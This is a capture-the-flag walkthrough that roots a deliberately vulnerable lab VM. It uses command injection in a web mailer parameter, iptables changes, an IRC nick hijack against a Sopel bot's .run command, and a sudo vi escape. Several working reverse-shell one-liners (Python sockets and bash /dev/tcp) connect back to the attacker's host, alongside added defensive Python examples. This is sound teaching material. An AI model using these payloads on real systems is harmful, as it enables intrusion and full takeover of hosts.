This VM is really awesome, especially the privilege escalation part! Let’s hack it!
RCE IS YOUR FRIEND
First of all, I discovered the open ports of the VM:
nmap 192.168.1.11 -p 1-65535
And I got this:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET
Nmap scan report for 192.168.1.11
Host is up (0.0081s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
6667/tcp filtered irc

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
I browsed to http://192.168.1.11 and found a submit form which said:
Enter a username to get started with this CTF!
Cool, I typed ReverseBrain and pressed the submit button. I was redirected to a page that gave me some tips; at the end of the page there was a link to start the VM. I clicked Start the CTF! and was redirected to http://192.168.1.11/?page=home. The first thing I tried was an LFI on the page parameter, http://192.168.1.11/?page=../../../../../../etc/passwd, and I got:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash
It seems the LFI worked! Looking at the page source, I noticed an HTML comment:
This is what we call 'dis-information' in the cyber security world! Are you learning anything new here ReverseBrain
Grrrr, it was a honeypot (the passwd output is fake: note the "steven?" user). Let's see if we can get /etc/shadow with http://192.168.1.11/?page=../../../../../../etc/shadow, but I got this:
That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though... (Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)
Now I tried to navigate around the website, but it seemed port 80 was closed. So I ran the nmap scan again:
nmap 192.168.1.11 -p 1-65535
And I discovered that the web server had moved to another port:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET
Nmap scan report for 192.168.1.11
Host is up (0.0082s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds
So I browsed to http://192.168.1.11:60080/, and on the new web page there was an image and a sentence which said:
HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!
Eheheheh. Now I tried to brute-force the page names. I browsed to http://192.168.1.11:60080/?page=test and got an error:
Dude, ReverseBrain what are you trying over here?!
Then I reloaded the page, intercepted the GET request with Burp Suite and sent it to Intruder with the following payload position:
GET /?page=§test§ HTTP/1.1
Host: 192.168.1.11:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
I used raft-small-directories-lowercase.txt as the wordlist (every wrong page name returns the same "Dude, ... what are you trying over here?!" error, so the valid pages stand out by response length) and found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a blue "Coming soon guys!" header. In the source code I found a comment which said:
/?page=mailer&mail=mail wallaby "message goes here"
So I checked whether the mail parameter was vulnerable to RCE by requesting http://192.168.1.11:60080/?page=mailer&mail=id, and I got:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
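Since ?mail=id returned the output of id, the parameter is not an argument to mail at all: it is the whole command, handed straight to a shell. To make the lesson concrete, here is an added Python example (my own code, not the VM's page and not from the write-up) with a reconstruction of that pattern next to a hardened mailer that only ever builds a fixed argv list. The vulnerable function is an assumption about what the page does; mail_bin is a hypothetical parameter so the safe path can be exercised with echo instead of a real mail binary.

```python
import re
import subprocess


def vulnerable_mailer(mail_param: str) -> str:
    """Reconstruction of the flaw: whatever arrives in ?mail= is run by /bin/sh,
    so shell metacharacters (; | $( ) and friends) in the parameter are honoured."""
    completed = subprocess.run(mail_param, shell=True, capture_output=True, text=True)
    return completed.stdout


# Strict allowlist: the shape of a plain local Unix user name, nothing else.
RECIPIENT_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_valid_recipient(recipient: str) -> bool:
    """True only for a bare user name; anything with metacharacters is rejected."""
    return RECIPIENT_RE.match(recipient) is not None


def build_mail_argv(recipient: str, subject: str = "CTF message", mail_bin: str = "mail") -> list:
    """Build the command as an argv list. The client never supplies a command,
    and each piece of client data is one argument that no shell re-parses."""
    if not is_valid_recipient(recipient):
        raise ValueError("invalid recipient: %r" % recipient)
    return [mail_bin, "-s", subject, recipient]


def safe_mailer(recipient: str, body: str, mail_bin: str = "mail") -> str:
    """Hardened mailer: fixed program, validated recipient, body on stdin, shell=False.
    mail_bin is a hypothetical knob so this can be tried with echo offline."""
    argv = build_mail_argv(recipient, mail_bin=mail_bin)
    completed = subprocess.run(argv, input=body, capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    # Constructed inputs: an injection attempt versus a normal message.
    print(vulnerable_mailer("echo injected; id"))                 # the injected command runs
    print(is_valid_recipient("wallaby; id"))                       # False
    print(safe_mailer("wallaby", "hi $(id)", mail_bin="echo"))     # body stays inert data
```

The fix is not escaping (escapeshellarg and friends help only if the command itself is fixed); it is refusing to let the client choose the command at all and never putting client data through a shell.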
Cool! Now I can get a reverse shell. First I started listening locally:
nc -lvp 1234
Then I requested (the browser URL-encodes the spaces and quotes in the payload):
http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now I had a reverse shell, and I upgraded it to a TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Now I needed to escalate privileges.
WATCH OUT FOR THE IRC BOTS!
First of all I ran sudo -l. This is the output:
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables
So I can modify the iptables rules as root. I took a look at the processes too:
waldo      727  0.0  0.5  29416  2924 ?        Ss   09:55   0:00 tmux new-session -d -s irssi
waldo      729  0.0  0.1   4508   700 pts/0    Ss   09:55   0:00 -sh
waldo      749  0.0  1.7 115744  8520 pts/0    Sl+  09:55   0:00 irssi
wallaby    977  0.0  4.9 516868 24964 ?        Sl   09:55   0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet
It seems that waldo is connected (irssi inside a tmux session) to the IRC server, which is not reachable from the external network, and that there is also an IRC bot built with Sopel and run as wallaby. First, let's check the iptables rules with iptables -L -n:
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     tcp  --  127.0.0.1            0.0.0.0/0            tcp dpt:6667
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:6667

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
As I suspected, the INPUT chain accepts connections to IRC port 6667 from 127.0.0.1 and drops them from every other source (0.0.0.0/0 means any address). I removed the DROP rule and appended an ACCEPT:
sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP
sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT
Note that since the INPUT policy is ACCEPT, deleting the DROP rule is already enough: the second command adds nothing, and as written it matches only the single address 0.0.0.0 (a bare -s address is a /32); the "any source" form is -s 0.0.0.0/0.
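Why deleting the DROP rule is the step that matters: iptables evaluates a chain top to bottom, the first matching rule decides, and only when nothing matches does the chain policy apply. The following added Python model (my code, not from the write-up or the VM) replays the INPUT chain above for an attacker packet before and after each command, and also parses the -s 0.0.0.0 rule as iptables does, i.e. as a /32. Rule, Packet and parse_rule are my constructions; the chains are built from the iptables -L -n output shown above.

```python
import ipaddress
import shlex
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Rule:
    target: str                  # -j ACCEPT / DROP
    src: str = "0.0.0.0/0"       # -s; when omitted iptables matches any source
    dport: Optional[int] = None  # --dport; None means any port (tcp only modelled)


@dataclass
class Packet:
    src: str
    dport: int


def parse_rule(spec: str) -> Rule:
    """Parse the options of an `iptables -A INPUT ...` command line that matter
    here. Only -s, --dport and -j are modelled; -p tcp / -m tcp are ignored."""
    tokens = shlex.split(spec)
    src, dport, target = "0.0.0.0/0", None, None
    for i, tok in enumerate(tokens):
        if tok == "-s":
            src = tokens[i + 1]
        elif tok == "--dport":
            dport = int(tokens[i + 1])
        elif tok == "-j":
            target = tokens[i + 1]
    if target is None:
        raise ValueError("rule has no -j target")
    return Rule(target, src, dport)


def matches(rule: Rule, pkt: Packet) -> bool:
    """A bare address such as -s 0.0.0.0 becomes a /32, exactly as iptables
    stores it, so it matches that one address and not 'anywhere'."""
    net = ipaddress.ip_network(rule.src, strict=False)
    return ipaddress.ip_address(pkt.src) in net and (rule.dport is None or rule.dport == pkt.dport)


def verdict(chain: List[Rule], policy: str, pkt: Packet) -> str:
    """First matching rule wins; if nothing matches, the chain policy applies."""
    for rule in chain:
        if matches(rule, pkt):
            return rule.target
    return policy


# The INPUT chain as listed on the box (constructed from the -L -n output above).
ORIGINAL_INPUT = [Rule("ACCEPT", "127.0.0.1", 6667), Rule("DROP", "0.0.0.0/0", 6667)]
AFTER_DELETE = [r for r in ORIGINAL_INPUT if r.target != "DROP"]
AFTER_APPEND = AFTER_DELETE + [parse_rule("iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT")]


if __name__ == "__main__":
    attacker = Packet("192.168.1.14", 6667)
    for name, chain in (("original", ORIGINAL_INPUT), ("after -D", AFTER_DELETE), ("after -A", AFTER_APPEND)):
        print(name, verdict(chain, "ACCEPT", attacker))
```

Run the same three chains with a DROP policy and you see the difference: with policy DROP the appended /32 rule would still leave the attacker blocked, and only a rule with -s 0.0.0.0/0 (or no -s at all) would open the port.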
Now I can connect to the IRC server from HexChat, which is already installed on my Kali box. I added a new server called CTF with IP/port 192.168.1.11/6667. The only available channel was #wallabyschat (I found it from irssi inside the exploited VM), so I joined it:
There were 3 users: me, waldo (the channel operator) and wallabysbot. The bot is built with Sopel, which accepts a lot of commands, including .run. I typed it and got a response from the bot:
Hold on, you aren't Waldo?
I analysed the command by browsing to /home/wallaby/.sopel/modules, where I found run.py:
import sopel.module, subprocess, os
from sopel.module import example

@sopel.module.commands('run')
@example('.run ls')
def run(bot, trigger):
    if trigger.owner:
        os.system('%s' % trigger.group(2))
        runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()
        runas = str(runas1)
        bot.say(' '.join(runas.split('\\n')))
    else:
        bot.say('Hold on, you aren\'t Waldo?')
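The weak spot is not the os.system call by itself but the gate in front of it: trigger.owner is decided by whoever currently holds the nick waldo, and an IRC nick is free for the taking the moment its holder drops off. The added Python example below (mine; not Sopel's code and not on the VM) replays the attack against a toy nick table and compares the nick-based check with one tied to a services account. Trigger, NickTable and the account name waldo are my constructions; the hardened check assumes the IRC network runs services so the bot can see the sender's account (Sopel, as far as I know, supports this through its owner_account setting).

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

OWNER_NICK = "waldo"       # Sopel's core.owner on the VM, inferred from the bot's reply
OWNER_ACCOUNT = "waldo"    # assumed services account name for the hardened check


@dataclass
class Trigger:
    """Stand-in for the two Sopel trigger attributes that matter here."""
    nick: str
    account: Optional[str] = None   # services account if identified, else None


def vulnerable_is_owner(trigger: Trigger) -> bool:
    """Nick-based ownership: whoever holds the nick right now is 'waldo'."""
    return trigger.nick == OWNER_NICK


def hardened_is_owner(trigger: Trigger) -> bool:
    """Account-based ownership: the sender must be identified to services as
    the owner's account. Holding the nick alone proves nothing."""
    return trigger.account is not None and trigger.account == OWNER_ACCOUNT


class NickTable:
    """Minimal model of an IRC server's nick handling: a nick is held by one
    client until that client disconnects or is timed out."""

    def __init__(self) -> None:
        self.holders: Dict[str, str] = {}

    def take(self, nick: str, client: str) -> bool:
        holder = self.holders.get(nick)
        if holder is not None and holder != client:
            return False            # ERR_NICKNAMEINUSE
        self.holders[nick] = client
        return True

    def disconnect(self, client: str) -> None:
        self.holders = {n: c for n, c in self.holders.items() if c != client}


def simulate_takeover(attacker: str = "reversebrain") -> List[Tuple[str, bool]]:
    """Replay the sequence from this write-up and record what each check says."""
    server = NickTable()
    server.take(OWNER_NICK, "waldo-irssi")            # the real waldo is connected
    steps = []
    steps.append(("attacker takes nick while waldo online", server.take(OWNER_NICK, attacker)))
    server.disconnect("waldo-irssi")                  # firewall rule -> ping timeout
    steps.append(("attacker takes nick after timeout", server.take(OWNER_NICK, attacker)))
    hijacker = Trigger(nick=OWNER_NICK, account=None)  # has the nick, not the account
    steps.append(("vulnerable owner check passes", vulnerable_is_owner(hijacker)))
    steps.append(("hardened owner check passes", hardened_is_owner(hijacker)))
    return steps


if __name__ == "__main__":
    for step, result in simulate_takeover():
        print("%-42s %s" % (step, result))
```

Even with the account check, a .run command that executes arbitrary strings as the bot's user is a bad idea; an allowlist of commands run without a shell is the sane version, but the identity check is what this box turns on.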
Nice! There is an RCE vulnerability, but the bot only runs the command when trigger.owner is true, and Sopel decides that by nick: I need to be waldo on IRC first. (Note that it is the os.system call that runs the payload; the Popen call gets the same string without shell=True, so it only works for a bare program name.) To free the nick, I edited the iptables rules so that waldo's irssi session would lose its connection to the server:
sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP
After some minutes waldo's session timed out and the nick was free. Then I changed my nick with /nick waldo.
Now I tried the RCE again as waldo, and it worked! I started listening locally:
nc -lvp 1235
Then I sent the bot this command:
.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now I had another reverse shell, this time as wallaby. I upgraded it to a TTY and ran sudo -l. This is the output:
Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
I can run any command with sudo. So I typed:
export TERM=xterm
sudo vi
Then I pressed ESC to enter command mode and pressed ENTER. Now I started listening locally:
nc -lvp 1236
Then from vi I typed:
:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1
Now I had a shell as root. Browsing /root, I found flag.txt:
###CONGRATULATIONS###
You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!
This was my first vulnerable machine/CTF ever! I hope you guys enjoyed playing it as much as I enjoyed making it!
Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.
Thanks guys!
-Waldo